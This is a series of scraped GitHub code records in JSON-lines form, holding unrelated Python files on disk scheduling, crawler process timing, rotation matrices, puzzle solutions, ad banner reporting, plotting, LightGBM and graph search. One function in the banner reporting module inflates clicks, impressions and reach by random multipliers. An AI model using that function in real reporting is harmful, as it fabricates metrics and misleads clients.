if(abs((y_test_both[i]) - predicted_both[i]) < 1):\n correct += 1\n\n print(\"BOTH:\" + str((correct / test_len_both) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_both) * 100):\n optimal = (correct / test_len_both) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL BOTH:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + \"\\n\")\n","repo_name":"makisto/mmo","sub_path":"Lab3/lab31.py","file_name":"lab31.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15638728041","text":"\nimport numpy as np\ndef CLOOK(totalDiskSize, initialHeadPosition, direction, requested_tracks):\n data = requested_tracks\n c_lookDataList= []\n counter = 0\n\n # requestNumber = int(input(\"Enter number of request: \"))\n\n # for item in range(1, requestNumber+1):\n # tempRequestSequence = int(input(f\"Process #{item}: \"))\n # data.append(tempRequestSequence)\n\n # print(f\"Unsorted: {data}\") # Unsorted Data\n data.sort()\n # print(f\"Sorted: {data}\") # Sorted Data\n\n # initialHeadPosition = int(input(\"Enter Head Position: \"))\n initialHeadPosition = initialHeadPosition\n # c_lookDataList.append(initialHeadPosition)\n # totalDiskSize = int(input(\"Enter Disk Size: \"))\n totalDiskSize = totalDiskSize\n # direction = (input(\"Enter Direction[High / Low]: \"))\n direction = direction\n\n requestNumber = len(data)\n if direction.lower() == \"high\":\n for item in range(requestNumber):\n if data[item] == initialHeadPosition:\n counter = item\n for i in range(requestNumber-item): \n c_lookDataList.append(data[item])\n item+=1\n\n for j in range(counter):\n c_lookDataList.append(data[j])\n\n # print(f\"\\nProcess: {data}\")\n # print(f\"Graph: {c_lookDataList}\")\n\n\n\n elif direction.lower() == \"low\":\n for item in range(requestNumber):\n if data[item] == initialHeadPosition:\n for i in range(item+1):\n c_lookDataList.append(data[item])\n item-=1\n \n for j in range(requestNumber-len(c_lookDataList)):\n c_lookDataList.append(data[requestNumber-1])\n requestNumber-=1\n\n # print(f\"\\nProcess: {data}\")\n # print(f\"Graph: {c_lookDataList}\")\n currentTime = 0\n rand_floats = [currentTime]\n for i in range(len(requested_tracks)-1):\n
currentTime += np.random.randint(1, 11) # randint replaces the removed random_integers; its upper bound is exclusive\n if currentTime in rand_floats:\n currentTime += 0.5 + np.random.randint(1, 11) + np.random.uniform(0.1, 0.9)\n rand_floats.append(currentTime)\n\n head_movements_calculation_string = []\n total_head_movements = 0\n # Calculation of total number of head movements\n for index in range(len(requested_tracks) - 1):\n total_head_movements += abs(requested_tracks[index] - requested_tracks[index + 1])\n if index == len(requested_tracks) - 2: # last pair visited by this loop\n plus_symbol = \"\" \n else: \n plus_symbol = \" +\"\n if requested_tracks[index] > requested_tracks[index + 1]:\n bigger = requested_tracks[index]\n smaller = requested_tracks[index + 1]\n else:\n bigger = requested_tracks[index + 1]\n smaller = requested_tracks[index]\n\n head_movements_calculation_string.append(\"(\" + str(bigger) + \"-\" + str(smaller) + \")\" + plus_symbol)\n\n head_movements_calculation_string = \" \".join(head_movements_calculation_string)\n head_movements_calculation_string = head_movements_calculation_string.rstrip('+') \n return rand_floats, total_head_movements, head_movements_calculation_string, c_lookDataList\n","repo_name":"0xM1cx/Disk_Scheduling_Algorithm","sub_path":"CLookDiskScheduling.py","file_name":"CLookDiskScheduling.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5730406417","text":"import subprocess\r\nimport os\r\nimport time\r\nfrom datetime import datetime\r\nfrom jazzstock_crawl.windows.crawl_snd_basic import get_stockcode_to_update as snd_counter\r\nfrom jazzstock_crawl.windows.crawl_ohlc_5min import get_stockcode_to_update as ohlc_min_counter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nPATH_CWD = 'c://workspace/jazzstock_crawl/windows'\r\nPATH_LOG = os.path.join(PATH_CWD, 'log/windows_%s.log'%(str(datetime.now().date())))\r\n\r\n\r\n# Parallel execution ===============================================================================================\r\n# pa = subprocess.Popen(['python3', '-u', '/workspace/jazzstock_script_runner/child.py', '5'],\r\n# stdout=open(os.path.join(PATH_LOG, 'test.log'), 'a'), bufsize=100,\r\n# universal_newlines=True)\r\n#\r\n# pb = subprocess.Popen(['python3', '-u', '/workspace/jazzstock_script_runner/child.py', '40'],\r\n# stdout=open(os.path.join(PATH_LOG, 'test.log'), 'a'), bufsize=100,\r\n# universal_newlines=True)\r\n\r\n# dic = {pa.pid: pa,\r\n# pb.pid: pb}\r\n#\r\n# check_process_is_finish(dic)\r\n\r\n# Run WITH TIMER ===============================================================================================\r\n\r\n\r\n\r\ndef run_process(script_path, iteration=1, life=60):\r\n i = 0\r\n while i < iteration:\r\n i+=1\r\n start = datetime.now()\r\n print('* RUN PROCESS %s FOR %s TIME, NOW: %s'%(script_path, i, start))\r\n process = subprocess.Popen(['python', '-u', script_path],\r\n stdout=open(PATH_LOG, 'a'), bufsize=100,\r\n universal_newlines=True)\r\n\r\n\r\n while True:\r\n elapesd_seconds = (datetime.now()-start).seconds\r\n\r\n # IF SCRIPT IS DONE\r\n if process.poll() is not None:\r\n print(i, process.poll(), elapesd_seconds, 'DONE')\r\n break\r\n\r\n # IF TIMEOVER\r\n elif elapesd_seconds > life:\r\n print(i, process.poll(), elapesd_seconds, \"TIMEOVER\")\r\n process.kill()\r\n break\r\n\r\n # ELAPSED TIME CHECK EVERY 5 SECONDS\r\n else:\r\n time.sleep(5)\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n\r\n # snd_flag = 9999\r\n # the_date = '2020-11-13'\r\n # while snd_flag > 50:\r\n # 
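# Editor's note: np.random.random_integers was deprecated in NumPy 1.11 and later
# removed; np.random.randint(1, 11) used above is the drop-in equivalent of
# random_integers(1, 10), because randint's upper bound is exclusive. The newer
# Generator API is another option -- a minimal sketch:
import numpy as np

rng = np.random.default_rng(seed=0)  # seed only to make the sketch reproducible
print(rng.integers(1, 11))   # uniform integer in [1, 10]
print(rng.uniform(0.1, 0.9)) # uniform float in [0.1, 0.9)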
run_process(script_path=os.path.join(PATH_CWD, 'crawl_snd_basic.py'), iteration=1, life=30)\r\n # f = open('c:\\\\workspace\\\\jazstock_crawl\\\\log\\\\snd.log', 'r')\r\n # print(f.readline())\r\n # f.close()\r\n #\r\n # else:\r\n # print(\"SND_DONE\")\r\n\r\n\r\n # while ohlc_min_counter('2020-11-13')['result'] > 50:\r\n # print(' * COUNTER : %s' % (ohlc_min_counter('2020-11-13')['result']))\r\n # run_process(script_path=os.path.join(PATH_CWD, 'date_idx_update.py'), iteration=1, life=60)\r\n # else:\r\n # print(\"OHLC_DONE\")\r\n\r\n\r\n # run_process(script_path=os.path.join(PATH_CWD, 'crawl_snd_basic.py'), iteration=1, life=200)\r\n\r\n\r\n run_process(script_path=os.path.join(PATH_CWD,'boot.py'),iteration=1,life=60)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_snd_basic.py'),iteration=35,life=200)\r\n run_process(script_path=os.path.join(PATH_CWD,'date_idx_update.py'),iteration=1,life=60)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_ohlc_5min.py'),iteration=35,life=200)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_index.py'),iteration=2,life=600)\r\n\r\n\r\n\r\n","repo_name":"jazztronomers/jazzstock_crawl","sub_path":"windows/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6258749315","text":"'''This module has a bunch of different functions that deal with\nrotations in 3-D space. It has no internal storage, so no class.\n\nSome notes:\n* Just for consistency, axes are labeled 0, 1, and 2.\n* All angles are in radians unless otherwise specified\n\nThis module has it own custom exception, `InvalidDCM` that is thrown\nif the user passes in stuff that is invalid for a DCM (e.g., an invalid \naxis combination for euler_angles)\n'''\nimport numpy as np\nimport math as m\n\nclass InvalidDCM(Exception):\n pass\n\ndef axis0(angle, degrees=False):\n '''Creates a DCM to rotate about axis 0 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_angle = m.radians(angle)\n else:\n i_angle = angle\n\n return np.array([[1., 0., 0.],[0., m.cos(i_angle), m.sin(i_angle)],[0., -m.sin(i_angle), m.cos(i_angle)]])\n\ndef axis1(angle, degrees=False):\n '''Creates a DCM to rotate about axis 1 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_ang = m.radians(angle)\n else:\n i_ang = angle\n\n return np.array([[m.cos(i_ang),0.,-m.sin(i_ang)],[0.,1.,0.],[m.sin(i_ang),0.,m.cos(i_ang)]])\n\ndef axis2(angle, degrees=False):\n '''Creates a DCM to rotate about axis 2 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_ang = m.radians(angle)\n else:\n i_ang = angle\n\n return np.array([[m.cos(i_ang),m.sin(i_ang),0.],[-m.sin(i_ang),m.cos(i_ang),0.,],[0.,0.,1.]])\n\ndef euler_angles(angles, axes, degrees=False):\n '''This creates a DCM that combines three angles, in the order specified by axes.\n The angle in location and axis [0] is applied first.\n\n Args:\n 
angles -- How far each rotation should happen\n axes -- indicies for which axis (0,1,2) should be rotated around\n\n Returns:\n A 3X3 numpy matrix that represents the rotation\n\n Raises:\n InvalidDCM\n '''\n if axes[0]==axes[1] or axes[1]==axes[2]:\n raise InvalidDCM('Two adjacent axes cannot be the same when using euler_angles')\n\n #fc = function_chooser\n fc = {0: axis0, 1: axis1, 2: axis2}\n \n going_out = np.identity(3)\n for ii in range(3):\n going_out = fc[axes[ii]](angles[ii],degrees).dot(going_out)\n\n return going_out\n\n","repo_name":"erik1026/EENG766_Final","sub_path":"rot.py","file_name":"rot.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70163358913","text":"\"\"\"Solution to day 13 parts 1 and 2\"\"\"\nimport re\n\nFIREWALL = \"\"\"0: 3\n1: 2\n4: 4\n6: 4\"\"\"\n\n\ndef load(day):\n \"\"\"Open specified days input file.\"\"\"\n filename = 'input_{}.txt'.format(str(day).zfill(2))\n return open(filename)\n\n\ndef parse_firewall_instruction(instruction):\n \"\"\"Parse single firewall instruction.\"\"\"\n layer, depth = re.match(r'(\\d+):\\s(\\d+)', instruction).groups()\n return int(layer), int(depth)\n\n\nassert parse_firewall_instruction(\"1: 2\") == (1, 2)\n\n\ndef parse_firewall(definition):\n \"\"\"Parse firewall definition to data structure.\"\"\"\n return {layer: depth for layer, depth in map(\n parse_firewall_instruction, definition.splitlines())}\n\n\nassert parse_firewall(FIREWALL) == {\n 0: 3,\n 1: 2,\n 4: 4,\n 6: 4\n}\n\n\ndef severity_cost_function(layer, depth):\n return layer * depth\n\n\ndef calculate_trip_severity(firewall, cost_function, offset=0):\n \"\"\" Example for depth 3\n 0 0\n 1 1\n 2 2\n 3 1\n 4 0\n 5 1\n 6 2\n 7 1\n 8 0\n \"\"\"\n severity = 0\n for layer, depth in firewall.items():\n if (layer + offset) % (2 * (depth - 1)) == 0:\n severity += cost_function(layer, depth)\n\n return severity\n\n\nassert calculate_trip_severity(parse_firewall(FIREWALL), severity_cost_function) == 24\n\n\nprint(\"Solution to part 1: {}\".format(\n calculate_trip_severity(\n parse_firewall(load(13).read()),\n severity_cost_function)))\n\n\ndef collision_cost_function(layer, depth):\n return 1\n\n\ndef wait_for_safe_firewall_traversal(firewall, cost_function):\n wait = 0\n while calculate_trip_severity(firewall, cost_function, wait):\n wait += 1\n return wait\n\n\nassert (wait_for_safe_firewall_traversal(parse_firewall(FIREWALL), collision_cost_function)) == 10\n\n\nprint(\"Solution to part 2: {}\".format(\n wait_for_safe_firewall_traversal(\n parse_firewall(load(13).read()),\n collision_cost_function)))\n","repo_name":"deluxebrain/advent-of-code-2017-python","sub_path":"day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1726298219","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom config import (BANNER_SHEET_ED_RANGE, BANNER_SHEET_EM_RANGE)\n\n\ndef set_project_for_banners(project):\n if project == 'ED':\n sheet_range = BANNER_SHEET_ED_RANGE\n re_banner_parameter = '.*(ed_ban.*)'\n ...\n elif project == 'EM':\n sheet_range = BANNER_SHEET_EM_RANGE\n re_banner_parameter = '.*(em_ban.*)'\n ...\n else:\n raise ValueError(\"Invalid project name\")\n return sheet_range, re_banner_parameter\n\n\ndef extract_banners_parameters(df, re_banner_parameter):\n df['Итоговая ссылка с меткой'] = df['Итоговая ссылка с 
меткой'].str.replace(rf'{re_banner_parameter}', r'\\1', regex=True)\n return df\n\n\n\ndef transform_plan_date_columns(df, column_a, column_b):\n mask = df[column_a].notnull()\n df.loc[mask, column_b] = df[column_a]\n return df\n\n\ndef transform_fact_date_columns(df, column_a, column_b):\n mask = df[column_b].isnull()\n df.loc[mask, column_b] = df[column_a]\n return df\n\n\ndef transform_banners_sheet(df, project, PLACEMENT_ERROR = 0):\n '''\n Converts the banner placement reporting table into a form that is convenient to merge with the Metrica data.\n Uses the error coefficient: if set to 1, it subtracts one day from the placement start date and adds one day to the placement end date\n \n '''\n df['Проект'] = project\n df = df.drop(df[df['Итоговая ссылка с меткой'] == \"Ошибка: Есть незаполненное поле\"].index)\n df['Реальная дата СТАРТА размещения'] = pd.to_datetime(df['Реальная дата СТАРТА размещения'], format=\"%d.%m.%Y\") - datetime.timedelta(days=PLACEMENT_ERROR)\n df['Реальная дата КОНЦА 
размещения', 'Реальная дата КОНЦА размещения'], axis=1)\n new_columns = {'ym:pv:pageviews': 'Клики','ym:pv:users': 'Уникальные клики','pageviews': 'Показы','users': 'Охват'}\n banner_report_df = banner_report_df.rename(columns=new_columns)\n banner_report_df['Дата начала размещения'] = pd.to_datetime(banner_report_df['Дата начала размещения'], format=\"%d.%m.%Y\")\n banner_report_df['Дата окончания размещения'] = pd.to_datetime(banner_report_df['Дата окончания размещения'], format=\"%d.%m.%Y\")\n banner_report_df[['Дата начала размещения','Дата окончания размещения']] = banner_report_df[['Дата начала размещения','Дата окончания размещения']].astype(str)\n ...\n return banner_report_df\n\n\ndef multiplication_metrics(df, list_of_metrics, min_multiplier, max_multiplier):\n df[list_of_metrics] = df[list_of_metrics].astype(float)\n # check random seed\n random_factors = np.random.uniform(min_multiplier, max_multiplier, size=(len(df), len(list_of_metrics)))\n df[list_of_metrics] = (df[list_of_metrics] + 1) * random_factors\n df[list_of_metrics] = df[list_of_metrics].round(0)\n df[list_of_metrics] = df[list_of_metrics].astype(str)\n return df","repo_name":"maksvg8/web-analytics","sub_path":"custom_reports/modules/banner_reporting.py","file_name":"banner_reporting.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14723278079","text":"import socket\n\n# create the socket object\ns = socket.socket()\n\n# port that we want to befriend\nport = 12345\n\n# connect to the server on local computer\ns.connect(('127.0.0.1',port))\n\n# receive data from the server\nprint(str(s.recv(1024)))\n# close the connection\ns.close()\n","repo_name":"davethedave41/ALprogramming","sub_path":"proxy/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35021679226","text":"def BinarySearch(pArr, pSearchItem, pStepNumber):\n '''\n Recursive function BinarySearch - find item in array pArr using BinarySearch algorithm\n\n Agruments\n pArr input Array\n pSearchItem search item\n pStepNumber number of search iteration\n '''\n if len(pArr) == 1:\n if pArr[0] == pSearchItem:\n return True, pStepNumber\n else:\n return False, pStepNumber\n else:\n vMediumElement = len(pArr)//2\n if pArr[vMediumElement] > pSearchItem:\n return BinarySearch(pArr[:vMediumElement], pSearchItem, pStepNumber+1)\n elif pArr[vMediumElement] < pSearchItem:\n return BinarySearch(pArr[vMediumElement:], pSearchItem, pStepNumber+1)\n elif pArr[vMediumElement] == pSearchItem:\n return True, pStepNumber\n\ndef BinarySearchWhile(pArr, pSearchItem):\n '''\n function BinarySearch using While cycle\n\n Agruments\n pArr input Array\n pSearchItem search item\n '''\n low = 0\n high = len(pArr)-1\n while low <= high:\n mid = (low+high) // 2\n guess = pArr[mid]\n if guess == pSearchItem:\n return True\n if guess > pSearchItem:\n high = mid -1\n else:\n low = mid + 1\n return False\n\n# test case\npArr = [2,3,6,11,25,34,45,90,34,22,19,45]\n# tesh using while cycle\nif BinarySearchWhile(sorted(pArr), 25):\n print ('Item found!')\n\n# test using recursive function\n(vFound, pStepNumber) = BinarySearch(sorted(pArr), 25, 1)\n# return FoundFlag and number of iterations\nif vFound:\n print ('Item found! 
Number of Iterations = ' + str(pStepNumber))\nelse:\n print ('Item not found!')\n\n","repo_name":"kozachenko-a/algorithms","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9713212254","text":"#!/usr/bin/python\n#import pprint\n\ndef inventory_unifi_radio(info):\n import json\n parsed = json.loads(\" \".join([item for sublist in info for item in sublist]))\n for radio in parsed[\"radio_table_stats\"]:\n name = radio[\"name\"]\n yield name, {}\n\n\n\ndef check_unifi_radio(item, params, info):\n import json\n parsed = json.loads(\" \".join([thing for sublist in info for thing in sublist]))\n if \"radio_table_stats\" not in parsed:\n return 3, \"no radio_table_stats\"\n for radio in parsed[\"radio_table_stats\"]:\n name = radio[\"name\"]\n if name == item:\n satisfaction = radio[\"satisfaction\"]\n state = radio[\"state\"]\n perfdata = [( \"satisfaction\", int(satisfaction))]# ( \"load1\", float(load1)), (\"load5\",float(load5)), (\"load15\",float(load15)) ]\n out = \"State: %s Satisfaction: %s%%\" % (state, satisfaction)\n state = 0\n return 0, out, perfdata\n\n\n\n\ncheck_info['unifi_aps.radio'] = {\n 'inventory_function': inventory_unifi_radio,\n 'check_function': check_unifi_radio,\n 'service_description': 'Unifi radio %s',\n 'has_perfdata': True,\n}\n","repo_name":"cstegm/checkmk_unifi_aps","sub_path":"checks/unifi_aps_radio.py","file_name":"unifi_aps_radio.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29875114734","text":"import pytube\n#from pytube import YouTube\nimport os\n\n# link = \"https://www.youtube.com/watch?v=mpjREfvZiDs\"\n# yt = pytube.YouTube(link)\n# stream = yt.streams.first()\n# stream.download()\n# video_name = stream.default_filename\n# os.rename(video_name, 'newvideo.mp4')\n\ndef download():\n link = input(\"Enter the youtube link you want to download: \")\n name = input(\"Name the video: \")\n yt = pytube.YouTube(link)\n stream = yt.streams.get_highest_resolution()\n stream.download()\n video_name = stream.default_filename\n os.rename(video_name, name + \".mp4\")\n\ndownload()\n","repo_name":"copyPasteNinja/Python","sub_path":"Learning/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34005104016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 8 11:44:58 2019\n\n@author: Jialong Jiang\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport scipy.io as sio\nimport numpy as np\nimport matplotlib as mpb\nimport matplotlib.gridspec as gridspec\nfrom plot_network import plot_network, move_axis\n\nmpb.rcParams.update({'font.size': 14})\nmpb.rcParams.update({'axes.labelsize': 16})\nmpb.rcParams.update({'axes.titlesize': 16})\nmpb.rcParams.update({'figure.dpi': 300})\n\nmdata = sio.loadmat('fig2_data')\nlocals().update(mdata)\nj_mat = - j_mat\nexter_h = - exter_h\ncur_j0 = - cur_j0\ncur_j1 = - cur_j1\ncur_j2 = - cur_j2\n\n\nfigw = 17.8 / 2.54 * 2\nfigh = 17.8 / 20 / 2.54 * 13 * 2\nfig = plt.figure(figsize=[figw, figh])\ngs = gridspec.GridSpec(2, 3, width_ratios=[1, 1, 1], height_ratios=[1, 1], \n left=0.08, right=0.9, top=0.94, bottom=0.1, \n wspace=0.25, hspace=0.25)\n\n\nax1 = plt.subplot(gs[0])\nax2 = plt.subplot(gs[1])\nax2pos = 
ax2.get_position()\n# ax3 = plt.subplot(gs[2])\nax4 = plt.subplot(gs[3])\nax4pos = ax4.get_position()\nax5 = plt.subplot(gs[4])\n# ax6 = plt.subplot(gs[5])\n\ndef process_axis(ax):\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n \nleftpos = ax2pos.x1 + 0.07\nrightpos = 0.94\n\ngs2 = gridspec.GridSpec(2, 2, left=leftpos, right=rightpos, \n top=ax4pos.y1, bottom=ax4pos.y0, \n wspace=0.15, hspace=0.05) \nax61 = plt.subplot(gs2[0]) \nprocess_axis(ax61)\nax62 = plt.subplot(gs2[1]) \nprocess_axis(ax62)\nax63 = plt.subplot(gs2[2]) \nprocess_axis(ax63)\nax64 = plt.subplot(gs2[3]) \nprocess_axis(ax64)\n\ngs1 = gridspec.GridSpec(2, 2, left=leftpos, right=rightpos, \n top=ax2pos.y1, bottom=ax2pos.y0, \n wspace=0.23, hspace=0.05) \nax31 = plt.subplot(gs1[0]) \nprocess_axis(ax31)\nax32 = plt.subplot(gs1[1]) \nprocess_axis(ax32)\nax33 = plt.subplot(gs1[2]) \nprocess_axis(ax33)\nax34 = plt.subplot(gs1[3]) \nprocess_axis(ax34)\n\nmove_axis(ax1, - 0.02, 0.02)\n\nmove_axis(ax31, 0, 0.02)\nmove_axis(ax32, 0, 0.02)\nmove_axis(ax33, 0, - 0.01)\n\nmove_axis(ax63, 0, - 0.03)\nmove_axis(ax64, 0, - 0.03)\n\nim_ax3 = ax31.imshow(rec_all_corr[:, :, 0], cmap='PiYG_r', clim=[- 1, 1])\nax32.imshow(np.mean(rec_all_corr[:, :, :3], axis=2), cmap='PiYG_r', clim=[- 1, 1])\nax33.imshow(np.mean(rec_all_corr[:, :, :6], axis=2), cmap='PiYG_r', clim=[- 1, 1])\nax34.axis('off')\n\njlim = 3.3\nim_ax6 = ax64.imshow(j_mat, cmap='bwr', clim=[- jlim, jlim])\nax61.imshow(cur_j0, cmap='bwr', clim=[- jlim, jlim])\nax62.imshow(cur_j1, cmap='bwr', clim=[- jlim, jlim])\nax63.imshow(cur_j2, cmap='bwr', clim=[- jlim, jlim])\n\nnode_posi = [0, 5, 10, 15]\nnode_ind = [1, 6, 11, 16]\n\ndef add_xtick(ax_list):\n for ax in ax_list:\n ax.set_xticks(node_posi)\n ax.set_xticklabels(node_ind)\n\ndef add_ytick(ax_list):\n for ax in ax_list:\n ax.set_yticks(node_posi)\n ax.set_yticklabels(node_ind)\n\nadd_xtick([ax33, ax32, ax63, ax64]) \nadd_ytick([ax31, ax33, ax61, ax63]) \n\n# ax32.set_xlabel('Node index')\nax31.set_ylabel('Node index')\nax61.set_ylabel('Node index')\n# ax63.set_xlabel('Node index')\n\nax31.set_title('No perturbation')\nax32.set_title('2 perturbations')\nax33.set_title('5 perturbations')\n\nax64.set_title('Ground truth')\nax61.set_title('No perturbation')\nax62.set_title('2 perturbations')\nax63.set_title('5 perturbations')\n\nax6c = fig.add_axes([0.95, 0.13, 0.01, 0.25])\ncbar = fig.colorbar(im_ax6, cax=ax6c, ticks=[- 3, 0, 3])\nax6c.set_ylabel('Interaction strength', position=[0.8, 0.62], labelpad=-4)\n\nax3c = fig.add_axes([0.95, 0.63, 0.01, 0.25])\ncbar = fig.colorbar(im_ax3, cax=ax3c, ticks=[- 1, 0, 1])\nax3c.set_ylabel('Correlation', position=[0.6, 0.5], labelpad=-5)\n\n\npos = np.load('pos16.npy', allow_pickle=True).item()\nax1, pos = plot_network(ax1, j_mat, 1, 1.3, pos=pos, labeldist=0.06)\nax1.set_ylim([ - 0.771, 1.09])\nax1.set_aspect('equal')\n\nax2.semilogy(np.diag(reald) * 6)\nax2.semilogy(rec_reald[:, 1] * 2, '--')\nax2.semilogy(rec_reald[:, 4], '-.')\nax2.set_yticks([1e-10, 1e-5, 1])\nax2.set_ylim([1e-12, 1e3])\nax2.set_xticks([0, 40, 80, 120])\nax2.set_xticklabels([120, 80, 40, 0])\nax2.set_xlabel('Eigenvalue index')\nax2.set_ylabel('Eigenvalues of $\\mathcal{I}$')\nax2.yaxis.set_label_coords(- 0.18, 0.52) \n\n\nxx_cutoff = 2000\ntrain_list = np.arange(1, num_epoch, rec_gap)\nax4.plot(train_list, datf0[0][0][3], label='No perturbation')\nax4.plot(train_list, datf1[0][0][3], '--', label='2 perturbations')\nax4.plot(train_list, datf2[0][0][3], '-.', label='5 perturbations')\nax4.set_xlim([0, 
xx_cutoff])\nax4.set_xlabel('Steps')\n# ax4.legend(bbox_to_anchor=(1.05, 1.35))\nax4.legend(bbox_to_anchor=(2.26, 1.57))\n#ax4.set_ylabel(r'$\\ell_2$ error')\nax4.set_ylabel(r'Mean error')\n\n\n\nax5.plot(train_list, datf0[0][0][2][:, 0])\nax5.plot(train_list, datf1[0][0][2][:, 0], '--')\nax5.plot(train_list, datf2[0][0][2][:, 0], '-.')\nax5.set_xlim([0, 2000])\nax5.set_xlabel('Steps')\nax5.set_ylabel('Edge prediction')\nax5.yaxis.set_label_coords(- 0.13, 0.5) \n\n\nabcd_size = 18\n\nfxx1 = 0.04\nfxx2 = 0.34\nfxx3 = 0.63\nfyy1 = 0.97\nfyy2 = 0.49\nfig.text(fxx1, fyy1, '(a)', fontsize=abcd_size)\nfig.text(fxx1, fyy2, '(d)', fontsize=abcd_size)\nfig.text(fxx2, fyy1, '(b)', fontsize=abcd_size)\nfig.text(fxx2, fyy2, '(e)', fontsize=abcd_size)\nfig.text(fxx3, fyy1, '(c)', fontsize=abcd_size)\nfig.text(fxx3, fyy2, '(f)', fontsize=abcd_size)\n\n\nplt.savefig('fig2.pdf', bbox_inches='tight')\n\n","repo_name":"JialongJiang/Active_learning_spin","sub_path":"Figures/Fig2/plog_fig2.py","file_name":"plog_fig2.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"31119901389","text":"# Author: Gary1111\n\nimport lightgbm as lgb\nimport pandas as pd\nfrom pandas import DataFrame\n\ntrain = pd.read_csv(\"train_XY.csv\", index_col=False)\ntest = pd.read_csv('test.csv',index_col=False)\ntest.rename(columns = {\"Unnamed: 0\" :'id'},inplace=True)\ntest['id'] = list(range(1,10001))\ntrain_x = train.drop(['id','label'],axis=1) # get the training features\ntrain_y = train['label']\nprint(train_x.shape,train_y.shape)\nprint(train_x.columns)\nprint(train_y)\n\nres = DataFrame()\nres['id'] = test['id']\ntest.drop('id',axis=1,inplace=True)\n\nclf = lgb.LGBMClassifier(\n boosting_type='gbdt', num_leaves=31, reg_alpha=0.0, reg_lambda=1,\n max_depth=-1, n_estimators=500, objective='multiclass',\n subsample=0.7, colsample_bytree=0.7, subsample_freq=1,\n learning_rate=0.1, min_child_weight=25, random_state=2018, n_jobs=50\n )\nclf.fit(train_x, train_y, eval_set=[(train_x, train_y)], early_stopping_rounds=100)\nres['label'] = clf.predict(test)\nprint(res.head(5))\nres.to_csv(\"submission.csv\",index=False)","repo_name":"GaryGky/Machine-Learning","sub_path":"Kanada-Project/LightGbm.py","file_name":"LightGbm.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10926308104","text":"\n# link: https://www.acmicpc.net/problem/1260\n# Level: S2\n# DFS, BFS fundamentals\n\ndef solution():\n import sys\n input = sys.stdin.readline\n\n node_count, edge_count, start_node = map(int, input().split())\n edge_list = [[] for _ in range(node_count + 1)]\n edge_list[0] = None\n for _ in range(edge_count):\n edge_start, edge_end = map(int, input().split())\n edge_list[edge_start].append(edge_end)\n edge_list[edge_end].append(edge_start)\n\n visited_DFS = [False] * (node_count + 1)\n visited_DFS[0] = None\n visited_DFS_seq = []\n\n def DFS(target_node):\n if visited_DFS[target_node] is True:\n return\n visited_DFS[target_node] = True\n visited_DFS_seq.append(target_node)\n for next_node in sorted(edge_list[target_node]):\n if visited_DFS[next_node] is False:\n DFS(next_node)\n DFS(start_node)\n\n visited_BFS = [False] * (node_count + 1)\n visited_BFS[0] = None\n visited_BFS_seq = []\n from collections import deque\n queue_BFS = deque()\n\n queue_BFS.append(start_node)\n while len(queue_BFS) != 0:\n target_node = queue_BFS.popleft()\n if visited_BFS[target_node] is True:\n 
